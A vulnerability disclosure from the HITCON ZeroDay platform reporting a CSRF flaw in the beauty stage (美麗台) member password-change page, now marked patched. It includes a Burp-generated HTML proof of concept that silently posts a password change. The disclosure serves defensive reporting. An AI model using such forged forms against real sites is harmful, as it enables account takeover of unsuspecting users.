beauty stage 美麗台 CSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2019-01327
  •  發信 Vendor: beauty stage美麗台
  • Title: beauty stage 美麗台 CSRF
  • Introduction: CSRF

處理狀態

目前狀態

公開
Last Update : 2020/02/11
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2019/12/27 23:04:04 : 新提交 (由 鄉民 更新此狀態)
  • 2019/12/27 23:07:22 : 新提交 (由 鄉民 更新此狀態)
  • 2019/12/27 23:33:10 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/12/30 12:29:24 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/12/30 12:29:24 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/12/30 12:29:24 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/01/14 17:45:14 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/01/14 17:45:14 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/01/14 18:18:32 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/01/15 09:04:50 : 未修補完成 (由 鄉民 更新此狀態)
  • 2020/01/19 21:34:49 : 已修補 (由 組織帳號 更新此狀態)
  • 2020/02/10 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2020/02/10 10:16:09 : 確認已修補 (由 鄉民 更新此狀態)
  • 2020/02/11 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2019-01327
  • 通報者:鄉民
  • 風險:低
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.beautystage.com.tw

https://www.beautystage.com.tw/member/index.php?action=member_edit

https://www.beautystage.com.tw/member/index.php?action=member_editpw

敘述

沒有token令牌去做相關的驗證身分,導致Csrf

PoC : 
 <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.beautystage.com.tw/member/index.php?action=member_editpw" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="mem_password_old" value="qazwsx90213" />
  <input type="hidden" name="mem_password" value="qazwsx90214" />
  <input type="hidden" name="mem_password_check" value="qazwsx90214" />
  <input type="hidden" name="input" value="確èªä¿®æ”¹" />
  <input type="hidden" name="it22_myAct" value="COMMAND_EDIT" />
  <input type="hidden" name="nti_JUFCJUJCJUFFeCVCOCVCNHklN0IlQjYlQjglQjklQkQlQUMlQUYlN0IlQUMlQjclQUElQUQlQkIlQjklODAlQUUlQUUlODElN0Q" value="MTU3NzQ1MTk5ODNiQ0Y5cmh2bUtQY25QMHFndlVjTGE2RGVRMXB6bUJW" />
  <input type="hidden" name="nti_JUFCJUJCJUFFeCVCOCVCNHklN0IlQjYlQjglQjklQkQlQUMlQUYlN0IlQUMlQjclQUElQUQlQkIlQjklODAlQUUlQUUlODElN0Q" value="MTU3NzQ1MTk5ODNiQ0Y5cmh2bUtQY25QMHFndlVjTGE2RGVRMXB6bUJW" />
  <input type="submit" value="Submit request" />
</form>
   </body>
 </html>

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;